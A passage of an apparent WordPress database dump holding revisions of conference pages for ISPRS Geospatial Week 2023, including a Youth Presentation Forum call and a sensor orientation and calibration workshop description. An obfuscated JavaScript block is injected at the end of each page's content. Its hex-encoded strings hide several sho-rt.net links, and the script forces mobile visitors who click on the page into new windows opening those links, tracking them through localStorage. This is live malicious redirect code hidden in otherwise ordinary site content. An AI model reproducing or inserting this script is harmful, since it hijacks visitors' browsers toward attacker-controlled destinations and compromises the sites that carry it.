)|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>Openness in Geospatial and Remote Sensing</strong>','','inherit','closed','closed','','3497-revision-v1','','','2023-02-05 14:39:47','2023-02-05 14:39:47','',3497,'https://gsw2023.com/?p=3841',0,'revision','',0),
(3842,1,'2023-02-05 14:40:42','2023-02-05 14:40:42','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"3618\" img_size=\"600x400\"][vc_single_image image=\"3620\" img_size=\"600x400\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\">Youth Presentation Forum</span></strong></h5>\n<p>&nbsp;</p>\n<h5 style=\"text-align: justify;\">The ISPRS Student Consortium (ISPRS SC) is the official representation of the students and the youth to ISPRS. One of its aims is to provide a platform for the exchange of information and to organize student-specific events and other activities that integrate students and the youth more effectively into ISPRS activities.<br />\nISPRS SC organizes a forum where students and young researchers attending the Geospatial Week 2023 can give a presentation about their research. We particularly encourage local and regional students to participate and provide the attendees with an overview of the geospatial and/or remote sensing research undertaken in Egypt and other African Regions, although presentations throughout the globe are welcomed.<br />\nThe objective of this forum is to provide a platform for communication, networking and exchange of research ideas among students and young professionals while promoting ISPRS SC and its activities. Moreover, as one of the ISPRS SC targets of 2023 is to expand our sphere of influence in Africa through Student Chapters and collaborations, this event will be an opportunity for us to connect with people and organizations that might become our next African partners.<br />\nImportantly, the best paper nominated from this forum will be eligible to compete for the ISPRS Student Consortium Excellence Award.</h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1 style=\"text-align: center;\">Forum Organizers</h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"68\"][vc_separator color=\"peacoc\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5><strong>Themes of the event:</strong></h5>\n<p>We welcome papers from students and young researchers submitting their research in all the areas using RS, GIS and Photogrammetry technologies in addition to the following themes:<br />\n⦁ GIS and Remote Sensing (RS) For a Sustainable Future.<br />\n⦁ Applications of Machine Learning in Geospatial Technologies.<br />\n⦁ Use of Open Source Tools/Technologies in GIS and Remote Sensing.<br />\n⦁ Crowdsourcing and Citizen Science in Geospatial Sector.<br />\n⦁ GIS Education and Outreach Activities.</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<h5><strong>Featuring Forum Report in ISPRS SC Newsletter:</strong></h5>\n<p>We accept both the abstracts and full papers that have been submitted by following ISPRS guidelines. After the forum, authors of the selected papers will be invited to submit an article detailing their research to the “Spectrum” (ISPRS SC Newsletter), in its Spotlight section. We will also feature the summary of this event in the Spectrum.[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Youth Presentation Forum','','inherit','closed','closed','','3613-revision-v1','','','2023-02-05 14:40:42','2023-02-05 14:40:42','',3613,'https://gsw2023.com/?p=3842',0,'revision','',0),
(3843,1,'2023-02-05 14:41:00','2023-02-05 14:41:00','[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"3267\" img_size=\"617x470\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]\r\n<h5 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\">SO&amp;C: Sensor orientation and calibration for mapping and navigation purposes</span></strong></h5>\r\n<h5></h5>\r\n<h5></h5>\r\n<h5></h5>\r\n&nbsp;\r\n<h5 style=\"text-align: justify; color: black;\"><strong>This workshop will concern various aspects of the research and implementations focused on the issues of sensor orientation and calibration. It will be an opportunity to present and to know the newest achievements in this scope related to ground-based, airborne and satellite systems. Technology brings new sensors constantly in aerial and satellite photogrammetry and remote sensing. Experimental works about the calibration and orientation of new technological solutions for mapping purposes are essential for worldwide photogrammetric society. The workshop will also be the opportunity to discuss the low-cost solutions used for mapping and navigation purposes. Since they are becoming increasingly popular nowadays, the quality of data collected by them can not be guaranteed without including sensor calibration and proper orientation methods.</strong></h5>\r\n<h5 style=\"text-align: justify; color: black;\"><strong>The workshop will be part of the ISPRS Geospatial Week 2023. It will be hosted by the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) in parallel with several related geospatial workshops. Any interested scientists and professionals can apply their submissions related to various remote sensing (optical, lidar, thermal, radar, lidar) and navigational (GNSS devices, IMUs, radar, magnetometers, odometers etc.) sensors collected with any platform to present them with thematic oral and poster sessions.</strong></h5>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]\r\n<h1><strong>Chairs</strong></h1>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"59\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]\r\n<h5><strong><u>Themes of the event:</u></strong></h5>\r\n<ul>\r\n 	<li><strong>State-of-the-art in orientation approaches of multi-sensor systems</strong></li>\r\n 	<li><strong>New calibration methods of mobile mapping platforms and systems for mapping and navigation purposes</strong></li>\r\n 	<li><strong>Challenges in aerial sensors calibration and orientation</strong></li>\r\n 	<li><strong>Testing new sensors and systems available in the market using the field-based and laboratory approaches</strong></li>\r\n 	<li><strong>Validation of satellite sensors in spectral and spatial quality, including testing micro- and nanosatellites</strong></li>\r\n 	<li><strong>Concepts of test fields for calibration of sensors, including the possibilities for aerial, low-altitude and terrestrial sensors</strong></li>\r\n 	<li><strong>New validation methods and case studies of photogrammetric and lidar sensors mainly referred to low-cost devices (i.e. hand scanners, smartphones)</strong></li>\r\n 	<li><strong>Sensors benchmarking – concepts and examples</strong></li>\r\n</ul>\r\n&nbsp;\r\n<h5><strong><u>Scientific Committee: (to be announced)</u></strong></h5>\r\n<ul>\r\n 	<li><strong>Khrystyna Burshtynska, Lviv Polytechnic National University, Ukraine</strong></li>\r\n 	<li><strong>Michael Cramer, University of Stuttgart, Germany</strong></li>\r\n 	<li><strong>Dorota Iwaszczuk, Technical University of Darmstadt, Germany</strong></li>\r\n 	<li><strong>Zdzisław Kurczyński, Warsaw University of Technology, Poland</strong></li>\r\n 	<li><strong>Jon Mills, Newcastle University, United Kingdom</strong></li>\r\n 	<li><strong>Fabio Remondino, Bruno Kessler Foundation FBK, Italy</strong></li>\r\n 	<li><strong>Jan Skaloud, Swiss Federal Institute of Technology EPFL, Switzerland</strong></li>\r\n 	<li><strong>Guo Zhang, Wuhan University, China</strong></li>\r\n</ul>\r\n[/vc_column_text][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( 